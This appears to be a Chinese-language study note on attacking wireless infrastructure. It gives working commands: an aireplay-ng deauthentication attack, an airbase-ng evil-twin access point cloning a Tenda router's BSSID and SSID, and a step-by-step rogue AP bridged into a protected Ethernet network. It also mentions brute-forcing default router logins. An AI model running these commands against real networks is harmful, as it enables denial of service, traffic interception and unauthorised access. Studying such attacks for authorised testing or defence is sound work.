攻击WLAN基础设施

破解AP的默认账户

一些路由的管理web页面账户密码默认：admin,123456等等

即使并非如此一般其登录密码一般也较为简单，通过对网络抓包分析,编码对其进行暴力攻击。
迅捷家用路由器模拟登录页面测试

拒绝服务攻击

aireplay-ng -0 -a ap_mac -c vitim_mac wlan0mon

evil twin和AP MAC地址欺骗攻击

evil twin（克隆AP）攻击：在受攻击的WLAN网络附近部署攻击者控制的AP{相同的SSID，BSSID，chanel,freq}

root@yue:~# airbase-ng --help

  Airbase-ng 1.5.2  - (C) 2008-2018 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows othe/    : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)
      -n hex           : User specified ANonce when doing the 4-way handshake

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

root@yue:~# airbase-ng -a  C8:3A:35:A7:A6:50 --essid Tenda_A7A650 -c 13 wlan1mon
21:45:12  Created tap interface at0
21:45:12  Trying to set MTU on at0 to 1500
21:45:12  Access Point with BSSID C8:3A:35:A7:A6:50 started.

无赖AP

未经授权便链接到需要授权才能访问的网络的AP

在绝大多数的情况下，无赖AP都会设置为开放验证且不启用任何加密机制。

部署无赖AP

• 在授权网络内部部署实际的物理设备作为无赖AP。—>不仅会危害无线安全，还会危及需要授权网络的物理安全。
• 以软件方式创建无赖AP，并在其桥接至需要授权网络的本地以太网网络。

以软件方式搭建无赖AP

1. 利用airbase-ng工具搭建AP

root@yue:~# airbase-ng -a AB:CD:EF:12:34:56 --essid ap_test -c 10 wlan1mon
16:32:23  Created tap interface at0
16:32:23  Trying to set MTU on at0 to 1500
16:32:23  Trying to set MTU on wlan1mon to 1800

ti_set_mac failed: Cannot assign requested address
You most probably want to set the MAC of your TAP interface.
ifconfig <iface> hw ether AB:CD:EF:12:34:56


16:32:23  Access Point with BSSID AB:CD:EF:12:34:56 started.

2. 在需要授权网络一部分的以太网接口和无赖AP接口之间完成桥接。在Kali Linux下安装bridge-utils,并创建网络接口wifi_bridge:

root@yue:~# brctl addbr wifi_bridge
root@yue:~# iwconfig
wifi_bridge  no wireless extensions.

at0       no wireless extensions.

eth0      no wireless extensions.

wlan1mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

3. 将以太网接口和airbase-ng工具创建的虚拟接口at0之间桥接

root@yue:~# brctl addif wifi_bridge eth0
root@yue:~# brctl addif wifi_bridge at0

4. 激活at0与wifi_bridge接口

root@yue:~# ifconfig eth0 0.0.0.0 up
root@yue:~# ifconfig at0 0.0.0.0 up

5. 激活端口转发功能

root@yue:~# echo 1 > /proc/sys/net/ipv4/ip_forward

okay…

激活网桥

root@yue:~# ifconfig wifi_bridge up

连接到无赖ap的无线客户端将会从需要授权的WLAN内的DHCP服务器接收IP地址